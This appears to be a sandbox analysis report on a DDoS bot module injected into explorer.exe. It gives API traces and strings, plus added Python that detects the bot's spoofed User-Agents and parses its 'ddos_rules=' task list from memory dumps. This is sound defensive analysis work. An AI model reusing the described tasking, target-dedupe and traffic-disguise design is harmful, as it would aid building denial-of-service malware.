                            • Leaf functions (no callees in the graph): 031D2ADD, 031D2B5F, 031D1F98, 031D2990, 031D1F10, 031D290C, 031D2B49, 031D2848, 031D2A08, 031D2947, 031D297D, 031D29BC, 031D28FF, 031D2AB9, 031D2B38, 031D7633, 031D2AEC, 031D1FE9, 031D1F2A, 031D3527, 031D1F61

                            Control-flow Graph

                            APIs
                              • Part of subcall function 031D2947: VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,031D102A), ref: 031D2954
                            • WSAStartup.WS2_32(00000202,?), ref: 031D103D
                            • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 031D1059
                            • NtUnmapViewOfSection.NTDLL(000000FF), ref: 031D1062
                            Memory Dump Source
                            • Source File: 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_31d1000_explorer.jbxd
                            Similarity
                            • API ID: MemoryMoveQuerySectionStartupUnmapViewVirtual
                            • String ID:
                            • API String ID: 2423705419-0
                            • Opcode ID: c5d9a8114d58b01058bacd4b95054bf188c2be9e2331700f39d0db78cac6216c
                            • Instruction ID: caa3c0ea386fa6cb49cf23e8889886c307f5ff32b61f7551c1ef7deb3e4f98fe
                            • Opcode Fuzzy Hash: c5d9a8114d58b01058bacd4b95054bf188c2be9e2331700f39d0db78cac6216c
                            • Instruction Fuzzy Hash: 03E02B3650331477C628B768BC0D9D63B5CAB0F330F004B25B9B8860D0DE71055482F2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                              • Part of subcall function 031D2B5F: GetTickCount.KERNEL32 ref: 031D2B5F
                              • Part of subcall function 031D2B38: GetProcessHeap.KERNEL32(00000008,00000364,031D104D), ref: 031D2B3B
                              • Part of subcall function 031D2B38: RtlAllocateHeap.NTDLL(00000000), ref: 031D2B42
                            • wsprintfA.USER32 ref: 031D10BB
                              • Part of subcall function 031D2990: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 031D299A
                              • Part of subcall function 031D2990: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,031D10CF,?,?,?,?,?,00000363), ref: 031D29AC
                            • RtlMoveMemory.NTDLL(00000000,0000000A,00000000), ref: 031D1110
                            • Sleep.KERNELBASE(000003E8,?,?,?,?,?,00000363), ref: 031D1138
                            Strings
                            • %s%s
                            • ddos_rules=
                            • |:|
                            Memory Dump Source
                            • Source File: 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_31d1000_explorer.jbxd
                            Similarity
                            • API ID: FileHeap$AllocateCountMappingMemoryMoveOpenProcessSleepTickViewwsprintf
                            • String ID: %s%s$ddos_rules=$|:|
                            • API String ID: 1711808818-2824953345
                            • Opcode ID: 13120c4886d61118bc192ba6d31a9f9765d272289f8099ce08c7c58214629774
                            • Instruction ID: e36e86506c2a2697b2690f0a0a69dbc2d09d97d7386427d0552f0fe1034012cb
                            • Opcode Fuzzy Hash: 13120c4886d61118bc192ba6d31a9f9765d272289f8099ce08c7c58214629774
                            • Instruction Fuzzy Hash: 4311BC787013106BC309FF74A88497E77569B8F610B444E28E9365F3C6EFB49D4B8662
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            Function 031D7633-031D780D, 55 basic blocks (nodes 28-82). Import-resolution loop: 31d7754-31d7758 -> 31d775a-31d7770 LoadLibraryA -> 31d7771-31d7776 -> 31d7783-31d7790 GetProcAddress -> 31d7792-31d7797 -> back to 31d7771. After the loop: 31d779f-31d77a2 -> 31d77a5-31d77ac -> 31d77d0-31d7800 VirtualProtect * 2 -> 31d7804-31d7808 (self-loop) -> 31d780a -> 31d780d (self-loop).
                            Memory Dump Source
                            • Source File: 0000000F.00000002.507953764.00000000031D6000.00000040.80000000.00040000.00000000.sdmp, Offset: 031D6000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_31d6000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: efe60f9a6d7f9ee73e931eaaa34431d1b65e703ff905e58be4891f701f0bb281
                            • Instruction ID: 52c3f72d1a36acac8ca27cdf563193e157fa5d340bd8dfa8ac032a68b4cb3e7c
                            • Opcode Fuzzy Hash: efe60f9a6d7f9ee73e931eaaa34431d1b65e703ff905e58be4891f701f0bb281
                            • Instruction Fuzzy Hash: C4513772A442525BE721CE7CCC847B5BBA4EB4B220B5D0BB9C5E5CB3C2F7945846C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • 92: 31d2990-31d29a2 OpenFileMappingA -> 93, 94
                            • 93: 31d29a4-31d29b4 MapViewOfFile -> 94
                            • 94: 31d29b7-31d29bb
                            APIs
                            • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 031D299A
                            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,031D10CF,?,?,?,?,?,00000363), ref: 031D29AC
                            Memory Dump Source
                            • Source File: 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_31d1000_explorer.jbxd
                            Similarity
                            • API ID: File$MappingOpenView
                            • String ID:
                            • API String ID: 3439327939-0
                            • Opcode ID: 1a369911aa09bbc8de58885155547c16ee0ce44699dace56cc8a410fc081ff0e
                            • Instruction ID: 5b91f9bf5866449d369a9bc73462684be303e01457570958dad473659748ea1b
                            • Opcode Fuzzy Hash: 1a369911aa09bbc8de58885155547c16ee0ce44699dace56cc8a410fc081ff0e
                            • Instruction Fuzzy Hash: EFD017327022317BE7386A6A6C0CF93AEDDCF8BAE1B050525B95DD2180D6608851C2F0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • 95: 31d297d-31d298f UnmapViewOfFile FindCloseChangeNotification
                            APIs
                            • UnmapViewOfFile.KERNEL32(00000000,?,031D1133,00000001,?,?,?,?,?,00000363), ref: 031D2981
                            • FindCloseChangeNotification.KERNELBASE(?,?,031D1133,00000001,?,?,?,?,?,00000363), ref: 031D2988
                            Memory Dump Source
                            • Source File: 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_31d1000_explorer.jbxd
                            Similarity
                            • API ID: ChangeCloseFileFindNotificationUnmapView
                            • String ID:
                            • API String ID: 943506614-0
                            • Opcode ID: f7d6cd966a1020b7f5beea7f07876aecfadab412f017da8f88452099fcc87337
                            • Instruction ID: 0a90aa8d4879d842586563f783dfb36fc609378ea37caeb71af134c72ea94d87
                            • Opcode Fuzzy Hash: f7d6cd966a1020b7f5beea7f07876aecfadab412f017da8f88452099fcc87337
                            • Instruction Fuzzy Hash: 1AB0123E40713097831C3764784CDDB3F18EE4F2213054950F169810088728489187F6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • 96: 31d2b38-31d2b48 GetProcessHeap RtlAllocateHeap
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000364,031D104D), ref: 031D2B3B
                            • RtlAllocateHeap.NTDLL(00000000), ref: 031D2B42
                            Memory Dump Source
                            • Source File: 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_31d1000_explorer.jbxd
                            Similarity
                            • API ID: Heap$AllocateProcess
                            • String ID:
                            • API String ID: 1357844191-0
                            • Opcode ID: 9cf281f19ab52d3515f54d637d7c6b007b5092c29b39345f1fc4f223c272a3d8
                            • Instruction ID: 18fca4c700a6a4cdeca294f2698bcb88681192ff818d70df90572d1d18f0dff1
                            • Opcode Fuzzy Hash: 9cf281f19ab52d3515f54d637d7c6b007b5092c29b39345f1fc4f223c272a3d8
                            • Instruction Fuzzy Hash: 85A00275553140EBDF48B7A4B90DA163628A749741F0089447195C5144996495548732
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • 452: 31d2297-31d22b5 RtlGetVersion -> 453, 454
                            • 453: 31d22bb-31d22f9 call 31d2b38, call 31d2b49 * 2 -> 461, 462
                            • 461: 31d22fb-31d22fc -> 463, 464
                            • 463: 31d231c-31d2321 -> 465
                            • 464: 31d22fe-31d22ff -> 466, 467
                            • 466: 31d2315-31d231a -> 465
                            • 467: 31d2301-31d2302 -> 468, 469
                            • 468: 31d230e-31d2313 -> 465
                            • 469: 31d2304-31d2305 -> 462, 470
                            • 470: 31d2307-31d230c -> 465
                            • 462: 31d2323 -> 465
                            • 465: 31d2328-31d2345 wsprintfA -> 454
                            • 454: 31d2346-31d234c
                            APIs
                            • RtlGetVersion.NTDLL(?), ref: 031D22AD
                              • Part of subcall function 031D2B38: GetProcessHeap.KERNEL32(00000008,00000364,031D104D), ref: 031D2B3B
                              • Part of subcall function 031D2B38: RtlAllocateHeap.NTDLL(00000000), ref: 031D2B42
                              • Part of subcall function 031D2B49: RtlRandom.NTDLL(031D4004), ref: 031D2B51
                            • wsprintfA.USER32 ref: 031D233C
                            Strings
                            • ; WOW64, xrefs: 031D22E9, 031D2329
                            • Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko, xrefs: 031D22A8
                            • ; Trident/7.0; rv:11.0) like Gecko, xrefs: 031D2323
                            • ; rv:58.0) Gecko/20100101 Firefox/58.0, xrefs: 031D231C, 031D2328
                            • ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 OPR/50.0.2762.67, xrefs: 031D230E
                            • Mozilla/5.0 (Windows NT %d.%d%s%s, xrefs: 031D2336
                            • ; Win64; x64, xrefs: 031D22EE
                            • ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36, xrefs: 031D2315
                            • ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299, xrefs: 031D2307
                            Memory Dump Source
                            • Source File: 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_31d1000_explorer.jbxd
                            Similarity
                            • API ID: Heap$AllocateProcessRandomVersionwsprintf
                            • String ID: ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299$) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36$) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 OPR/50.0.2762.67$; Trident/7.0; rv:11.0) like Gecko$; WOW64$; Win64; x64$; rv:58.0) Gecko/20100101 Firefox/58.0$Mozilla/5.0 (Windows NT %d.%d%s%s$Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                            • API String ID: 2455419440-3524962460
                            • Opcode ID: 1456e6e7bbb10b217d95c18af025451598c0e3a43a9fd3f7e51fc0ff20fd47c6
                            • Instruction ID: 06b61760cdc7686d8b459c2475a0ecec260bc080013c93845816e01bb7949268
                            • Opcode Fuzzy Hash: 1456e6e7bbb10b217d95c18af025451598c0e3a43a9fd3f7e51fc0ff20fd47c6
                            • Instruction Fuzzy Hash: 7B010438B0021C77C62EEA2C6E417BDA25CDB4F701F880D69A576F6A00D77088838773
                            Uniqueness

                            Uniqueness Score: -1.00%
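The 031D2297 routine above assembles the HTTP User-Agent from the major/minor numbers RtlGetVersion returns, one of the two architecture suffixes and one of the five browser suffixes listed under Strings, chosen with two RtlRandom calls and formatted with "Mozilla/5.0 (Windows NT %d.%d%s%s". The Python below is an added example for this report, not code from the sample or from Joe Sandbox: it enumerates every string that format can produce and uses the same building blocks to flag matching requests in a constructed HTTP log. Assumed, because the report does not show them: which RtlRandom value selects which suffix (enumerating all combinations sidesteps this), the set of Windows versions to expand, and the log line layout.

```python
"""Enumerate and match the User-Agent strings the 031D2297 routine can build.

Added example for this report; not code from the sample or from Joe Sandbox.
The format string and the suffixes are the strings listed for 031D2297.
Assumed: the Windows versions to expand, and that every suffix combination
is reachable (the RtlRandom-to-suffix mapping is not visible in the report).
"""
import re
from itertools import product
from typing import List, Tuple

UA_FORMAT = "Mozilla/5.0 (Windows NT %d.%d%s%s"
UA_FALLBACK = "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"

# Third format argument: architecture suffix (xrefs 031D22E9 / 031D22EE).
ARCH_SUFFIXES = ("; WOW64", "; Win64; x64")
# Fourth format argument: browser suffix, one per branch of the switch at 031D22FB.
BROWSER_SUFFIXES = (
    "; Trident/7.0; rv:11.0) like Gecko",
    "; rv:58.0) Gecko/20100101 Firefox/58.0",
    ") AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 OPR/50.0.2762.67",
    ") AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36",
    ") AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299",
)
# Assumed: the dwMajorVersion/dwMinorVersion pairs RtlGetVersion reports on
# hosts worth matching (XP through Windows 10/11, which reports 10.0).
WINDOWS_VERSIONS = ((5, 1), (6, 0), (6, 1), (6, 2), (6, 3), (10, 0))


def candidate_user_agents(major: int, minor: int) -> List[str]:
    """Every string wsprintfA can emit for one RtlGetVersion result."""
    return [UA_FORMAT % (major, minor, arch, browser)
            for arch, browser in product(ARCH_SUFFIXES, BROWSER_SUFFIXES)]


def all_candidate_user_agents() -> List[str]:
    """Full indicator list: all versions, all combinations, plus the static fallback."""
    uas = {ua for major, minor in WINDOWS_VERSIONS
           for ua in candidate_user_agents(major, minor)}
    uas.add(UA_FALLBACK)
    return sorted(uas)


# Match by structure rather than by list so an unexpected OS version still hits.
UA_PATTERN = re.compile(
    r"^Mozilla/5\.0 \(Windows NT \d+\.\d+"
    r"(?:" + "|".join(map(re.escape, ARCH_SUFFIXES)) + r")"
    r"(?:" + "|".join(map(re.escape, BROWSER_SUFFIXES)) + r")$"
    r"|^" + re.escape(UA_FALLBACK) + r"$"
)


def is_candidate_ua(user_agent: str) -> bool:
    """True when the header is one the routine could have produced."""
    return UA_PATTERN.match(user_agent) is not None


# Constructed sample log (not from the report): timestamp, client, method, path, ua.
SAMPLE_HTTP_LOG = """\
2022-11-29T10:01:12Z 10.0.0.5 POST /index.php ua="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
2022-11-29T10:01:13Z 10.0.0.7 GET /style.css ua="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
2022-11-29T10:01:20Z 10.0.0.5 POST /index.php ua="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"
2022-11-29T10:01:31Z 10.0.0.9 POST /index.php ua="Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"
"""
LOG_LINE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) ua="([^"]*)"$')


def find_candidate_requests(log_text: str) -> List[Tuple[str, str, str, str]]:
    """(timestamp, client, method, user-agent) for each line whose UA matches."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if m and is_candidate_ua(m.group(5)):
            hits.append((m.group(1), m.group(2), m.group(3), m.group(5)))
    return hits


if __name__ == "__main__":
    for hit in find_candidate_requests(SAMPLE_HTTP_LOG):
        print(*hit)
```

Every generated string is also a genuine 2018-era browser User-Agent (IE 11, Firefox 58, Chrome 64, Opera 50, Edge 16), so a hit is a weak indicator on its own: combine it with the request shape built in 031D23C2 (POST, Host, Content-Type: application/x-www-form-urlencoded, Referer) and pivot on the client address, since one host can emit several of these strings.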

                            APIs
                            • recv.WS2_32(00000000,00000000,00000064,00000000), ref: 031D1F42
                            Memory Dump Source
                            • Source File: 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_31d1000_explorer.jbxd
                            Similarity
                            • API ID: recv
                            • String ID:
                            • API String ID: 1507349165-0
                            • Opcode ID: f98b39d11d4593deeb72f246d11abd28706db5a274e2a81e0769f579e864561e
                            • Instruction ID: a71e39b6e158180d798ac503e7851674a89b6daae92df02ac39cfbcc095e56f0
                            • Opcode Fuzzy Hash: f98b39d11d4593deeb72f246d11abd28706db5a274e2a81e0769f579e864561e
                            • Instruction Fuzzy Hash: F5E086762051117BE758C87C9C48AB7A7ADDBCB270F184636F628CB182D760EC4A8271
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                              • Part of subcall function 031D2B38: GetProcessHeap.KERNEL32(00000008,00000364,031D104D), ref: 031D2B3B
                              • Part of subcall function 031D2B38: RtlAllocateHeap.NTDLL(00000000), ref: 031D2B42
                              • Part of subcall function 031D23C2: RtlZeroMemory.NTDLL(?,0000003C), ref: 031D245A
                              • Part of subcall function 031D290C: lstrlen.KERNEL32(031D4018,00000000,00000000,031D4018,031D11CD), ref: 031D2934
                              • Part of subcall function 031D290C: RtlMoveMemory.NTDLL(031D4FA4,031D4018,00000000), ref: 031D293D
                            • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 031D204B
                            • CharLowerA.USER32(00000000), ref: 031D2052
                              • Part of subcall function 031D29BC: lstrlen.KERNEL32(00000000,00000000,?,?,00000000,031D10E3,00000001,?,?,?,?,?,00000363), ref: 031D29CB
                              • Part of subcall function 031D29BC: lstrlen.KERNEL32(ddos_rules=,?,?,00000000,031D10E3,00000001,?,?,?,?,?,00000363), ref: 031D29D0
                            • lstrlen.KERNEL32(?,00000008), ref: 031D207B
                            • RtlMoveMemory.NTDLL(00000800,?,-00000001), ref: 031D208C
                            • RtlZeroMemory.NTDLL(00000000,00000800), ref: 031D214A
                            • RtlMoveMemory.NTDLL(00000000,-00000001,00000000), ref: 031D215B
                            • lstrlen.KERNEL32(00000000,00000001,00000001,00000001,?,-00000001,00000008), ref: 031D21A1
                            • RtlMoveMemory.NTDLL(00000200,00000000,-00000001), ref: 031D21B5
                            • wsprintfA.USER32 ref: 031D21DA
                            • wsprintfA.USER32 ref: 031D21F2
                            • lstrlen.KERNEL32(00000800), ref: 031D2202
                            • lstrlen.KERNEL32(00000400), ref: 031D2212
                            Strings
                            • %s%s
                            • href
                            • http
                            Memory Dump Source
                            • Source File: 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_31d1000_explorer.jbxd
                            Similarity
                            • API ID: Memorylstrlen$Move$HeapZerowsprintf$AllocateCharLowerProcess
                            • String ID: %s%s$href$http
                            • API String ID: 3375510705-2989893046
                            • Opcode ID: 4fae9d007f2f679fc41a0a667c75e331aa64fc61f3c08a46bc3ce4fa3e3bdf49
                            • Instruction ID: 7d76c4d2a0ea9ffdadd6ed8fc769d748262678fb8ec2e28e78fab7557a5e43ab
                            • Opcode Fuzzy Hash: 4fae9d007f2f679fc41a0a667c75e331aa64fc61f3c08a46bc3ce4fa3e3bdf49
                            • Instruction Fuzzy Hash: 7061C5796003185FCB14EF34988476E7399AB8F210F144E28F9B6EB2C1DB74D94787A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            Function 031D1140-031D135D, 26 basic blocks (nodes 471-508). Blocks with calls: 31d1156-31d1166 lstrlen; 31d116c-31d1181 RtlZeroMemory; 31d1183-31d1198 call 31d29bc; 31d119a-31d11d1 RtlZeroMemory RtlMoveMemory call 31d290c (loops back through 31d11d3-31d11e8 and 31d1183); 31d120d-31d122d WaitForMultipleObjects; 31d122f-31d1241 CloseHandle (self-loop); 31d1243-31d126f RtlZeroMemory call 31d234d call 31d2add; 31d129c-31d12d5 lstrlen RtlComputeCrc32 call 31d28ff -> 31d12d7-31d12da -> 31d12dc-31d12f8 CreateThread; 31d12fa-31d131f lstrlen RtlComputeCrc32 -> back to WaitForMultipleObjects; 31d1331-31d134e call 31d234d; exit block 31d1356-31d135d.
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 031D1157
                            • RtlZeroMemory.NTDLL(00040744), ref: 031D1179
                            • RtlZeroMemory.NTDLL(031D4018,00000104), ref: 031D11A4
                            • RtlMoveMemory.NTDLL(031D4018,00000000,-00000001), ref: 031D11BA
                              • Part of subcall function 031D290C: lstrlen.KERNEL32(031D4018,00000000,00000000,031D4018,031D11CD), ref: 031D2934
                              • Part of subcall function 031D290C: RtlMoveMemory.NTDLL(031D4FA4,031D4018,00000000), ref: 031D293D
                            • WaitForMultipleObjects.KERNEL32(031D400C,031D4010,00000001,000000FF), ref: 031D121E
                            • CloseHandle.KERNEL32(?), ref: 031D1233
                            • RtlZeroMemory.NTDLL(031D400C,00000324), ref: 031D1249
                            • lstrlen.KERNEL32(?,?,?,?), ref: 031D12A2
                            • RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 031D12B4
                            • CreateThread.KERNEL32(00000000,00000000,031D135E,00000000,00000000,00000000), ref: 031D12E8
                            • lstrlen.KERNEL32(?,00000000,?,?,?), ref: 031D12FE
                            • RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 031D1310
                              • Part of subcall function 031D29BC: lstrlen.KERNEL32(00000000,00000000,?,?,00000000,031D10E3,00000001,?,?,?,?,?,00000363), ref: 031D29CB
                              • Part of subcall function 031D29BC: lstrlen.KERNEL32(ddos_rules=,?,?,00000000,031D10E3,00000001,?,?,?,?,?,00000363), ref: 031D29D0
                            Memory Dump Source
                            • Source File: 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_31d1000_explorer.jbxd
                            Similarity
                            • API ID: lstrlen$Memory$Zero$ComputeCrc32Move$CloseCreateHandleMultipleObjectsThreadWait
                            • String ID:
                            • API String ID: 729650260-0
                            • Opcode ID: dfe081af59d57071776a8f31b601896f79d49752174f613fc26b5f6cc385ea4d
                            • Instruction ID: b455d9749138b835209f7e44dc1c0c0e80c5cbaca8d49866a3aa15c066d053d0
                            • Opcode Fuzzy Hash: dfe081af59d57071776a8f31b601896f79d49752174f613fc26b5f6cc385ea4d
                            • Instruction Fuzzy Hash: 29511239606224FFD718EF64F884BA973A9EB4F310F140578E99187284DF31A895CB71
                            Uniqueness

                            Uniqueness Score: -1.00%
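Two routines above describe how the injected module takes its tasking: 031D106E formats a name with "%s%s", opens a file mapping with OpenFileMappingA/MapViewOfFile once a second (Sleep 0x3E8) and searches the view for "ddos_rules="; 031D1140 then measures each entry with lstrlen, copies it into the 0x104-byte buffer at 031D4018, hashes it with RtlComputeCrc32 (initial value 0), and reaches CreateThread after the hash check, waiting on the handles with WaitForMultipleObjects. The "|:|" separator comes from the String ID of 031D106E. The Python below is an added example for this report, not code from the sample or from Joe Sandbox: given a dump of such a mapping, it recovers the task list the same way, so an analyst can pull the targets from a memory image without running the sample. Assumed and not shown by the report: that the value is NUL-terminated ASCII, that the CRC-32 is the identity used to skip entries already running, and the entry syntax in the constructed sample.

```python
"""Parse the "ddos_rules=" task list the injected module polls from a file
mapping (031D106E) and splits, hashes and dispatches per entry (031D1140).

Added example for this report; not code from the sample or from Joe Sandbox.
From the report: the key "ddos_rules=", the separator "|:|", RtlComputeCrc32
with InitialCrc 0 over each entry, CreateThread after the hash check, and
the 0x104-byte destination buffer zeroed before each copy.
Assumed: the value is ASCII and ends at the first NUL, the CRC-32 decides
whether an entry is already running, and the rule syntax in the sample data.
"""
import zlib
from typing import Dict, List, Tuple

KEY = b"ddos_rules="
SEPARATOR = b"|:|"
RULE_BUFFER_SIZE = 0x104          # RtlZeroMemory(031D4018, 0x104) before each copy


def rtl_compute_crc32(data: bytes, initial: int = 0) -> int:
    """RtlComputeCrc32 is the standard reflected CRC-32; with InitialCrc 0,
    as the sample calls it, the result equals zlib.crc32(data)."""
    return zlib.crc32(data, initial) & 0xFFFFFFFF


def extract_rules(mapping: bytes) -> List[bytes]:
    """Locate the key in a dumped mapping and split its value on '|:|'."""
    start = mapping.find(KEY)
    if start < 0:
        return []
    value = mapping[start + len(KEY):]
    end = value.find(b"\x00")
    if end >= 0:
        value = value[:end]
    rules = []
    for entry in value.split(SEPARATOR):
        # lstrlen + RtlMoveMemory into a 0x104-byte NUL-filled buffer: an
        # over-long entry is cut to fit here (assumed; not shown in the report).
        entry = entry[:RULE_BUFFER_SIZE - 1]
        if entry:
            rules.append(entry)
    return rules


class RuleDispatcher:
    """Replay the dedupe: an entry whose CRC-32 was seen before is skipped,
    a new one would get its own thread (recorded here instead of started)."""

    def __init__(self) -> None:
        self.running: Dict[int, bytes] = {}

    def poll(self, mapping: bytes) -> List[Tuple[int, bytes]]:
        started = []
        for rule in extract_rules(mapping):
            crc = rtl_compute_crc32(rule)
            if crc in self.running:
                continue
            self.running[crc] = rule
            started.append((crc, rule))
        return started


# Constructed mapping contents (documentation addresses, not from the report):
# one entry listed twice, then a later poll that adds a third target.
CONSTRUCTED_MAPPING_1 = (
    b"\x00" * 8 + KEY
    + b"http://203.0.113.10/|:|203.0.113.11:443|:|http://203.0.113.10/"
    + b"\x00" + b"\xcc" * 16
)
CONSTRUCTED_MAPPING_2 = (
    b"\x00" * 8 + KEY
    + b"http://203.0.113.10/|:|203.0.113.11:443|:|203.0.113.12:80"
    + b"\x00"
)


if __name__ == "__main__":
    dispatcher = RuleDispatcher()
    for mapping in (CONSTRUCTED_MAPPING_1, CONSTRUCTED_MAPPING_2):
        for crc, rule in dispatcher.poll(mapping):
            print("start thread for %08x %s" % (crc, rule.decode()))
```

Against a real memory image, feed the dumped section (or the whole process memory) to extract_rules; because the search is a plain substring match, as the lstrlen-based helper at 031D29BC appears to be, it also works on dumps where the mapping has already been unmapped but the copy at 031D4018 and the heap buffers remain.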

                            Control-flow Graph

                            Function 031D23C2-031D2788, 52 basic blocks (nodes 509-598). Blocks with calls: 31d23c2-31d241e call 31d278b, call 31d2b38, call 31d2ab9, call 31d2848; 31d2451-31d2487 RtlZeroMemory; 31d24aa-31d24bb call 31d27b9; 31d2522-31d2543 call 31d2a08; 31d25d1-31d25ff call 31d2b38 wsprintfW; 31d2634-31d266d call 31d2b38 wsprintfW; 31d26a8-31d26c4 call 31d2b38; 31d26d3-31d26e0 call 31d2afd (inside the loop 31d26c6-31d270a); 31d2712 call 31d2aec -> 31d2717-31d2721 RtlMoveMemory; cleanup paths 31d2727-31d2729, 31d272e-31d2747, 31d2749-31d274b, 31d2766-31d2768 and 31d2778-31d2788 each call 31d2b1a.
                            APIs
                              • Part of subcall function 031D2B38: GetProcessHeap.KERNEL32(00000008,00000364,031D104D), ref: 031D2B3B
                              • Part of subcall function 031D2B38: RtlAllocateHeap.NTDLL(00000000), ref: 031D2B42
                              • Part of subcall function 031D2AB9: lstrlen.KERNEL32(?,00000000,00000000,00000000,031D23FF,00000000,?,?,00000001), ref: 031D2AC1
                              • Part of subcall function 031D2AB9: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,00000001), ref: 031D2AD3
                              • Part of subcall function 031D2848: RtlZeroMemory.NTDLL(?,00000018), ref: 031D285B
                            • RtlZeroMemory.NTDLL(?,0000003C), ref: 031D245A
                            • wsprintfW.USER32 ref: 031D25EB
                            • wsprintfW.USER32 ref: 031D265C
                            • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 031D2721
                            Strings
                            • Accept: */*Referer: %S
                            • Content-Type: application/x-www-form-urlencoded
                            • Host: %s
                            • POST
                            Memory Dump Source
                            • Source File: 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_31d1000_explorer.jbxd
                            Similarity
                            • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                            • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                            • API String ID: 4204651544-1701262698
                            • Opcode ID: fae61ac2eef9a382aa3f464c30fdc83abbde61dca10618dc18e0d3f138f3aaf5
                            • Instruction ID: 0e05412a19f1be4b8ed13e837b7bcfc1c40892311b2976dcdbb2468211fbe287
                            • Opcode Fuzzy Hash: fae61ac2eef9a382aa3f464c30fdc83abbde61dca10618dc18e0d3f138f3aaf5
                            • Instruction Fuzzy Hash: 04B17E78609341AFD724EF64D944A6BBBE8FF8E244F044D2DF9A5C7250DB309846CB62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • 599: 31d1f98-31d1fe6 RtlZeroMemory htons inet_addr connect
                            APIs
                            • RtlZeroMemory.NTDLL, htons.WS2_32, inet_addr.WS2_32, connect.WS2_32 (single block 031D1F98-031D1FE6)
                            Memory Dump Source
                            • Source File: 0000000F.00000002.507850080.00000000031D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 031D1000, based on PE: false
                            Joe Sandbox IDA Plugin
